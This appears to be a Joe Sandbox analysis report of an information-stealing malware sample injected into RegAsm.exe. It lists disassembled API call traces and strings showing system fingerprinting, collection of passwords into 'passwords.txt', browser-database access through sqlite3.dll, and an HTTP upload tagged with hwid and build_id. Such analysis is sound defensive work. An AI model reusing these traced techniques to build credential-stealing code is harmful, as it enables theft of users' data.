Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Processor: , xrefs: 0041422D
TimeZone: , xrefs: 004141AC
Windows: , xrefs: 00413E70
MachineID: , xrefs: 00413C80
Computer Name: , xrefs: 00413FAD
Install Date: , xrefs: 00413ED1
HWID: , xrefs: 00413D4E
Keyboard Languages: , xrefs: 004140DE
Threads: , xrefs: 004142EF
AV: , xrefs: 00413F3E
Version: , xrefs: 00413B9F
VideoCard: , xrefs: 004143B7
Date: , xrefs: 00413C1F
Cores: , xrefs: 0041428E
[Software], xrefs: 004144A3
RAM: , xrefs: 00414350
Local Time: , xrefs: 0041414B
GUID: , xrefs: 00413CE1
information.txt, xrefs: 00414573
Display Resolution: , xrefs: 0041406F
User Name: , xrefs: 0041400E
[Processes], xrefs: 0041442A
Path: , xrefs: 00413DBB
Work Dir: In memory, xrefs: 00413E30
[Hardware], xrefs: 0041420D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3279995179-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

ERROR, xrefs: 00416BD6
ERROR, xrefs: 00416B51
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
ERROR, xrefs: 00416BAA
sqlite3.dll, xrefs: 00416C9C
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
sqlp.dll, xrefs: 00416CFE
.vA, xrefs: 00416D1D
ERROR, xrefs: 00416BE8
sqlite3.dll, xrefs: 00416C68
ERROR, xrefs: 00416AF1
sqlp.dll, xrefs: 00416CCD
ERROR, xrefs: 00416A98
ERROR, xrefs: 00416BC0

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404DFB
hwid, xrefs: 00404EAD
------, xrefs: 00404C75
8wA, xrefs: 00405222
build_id, xrefs: 0040500D
", xrefs: 00405039
------, xrefs: 00404F5B
", xrefs: 00404ED9

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

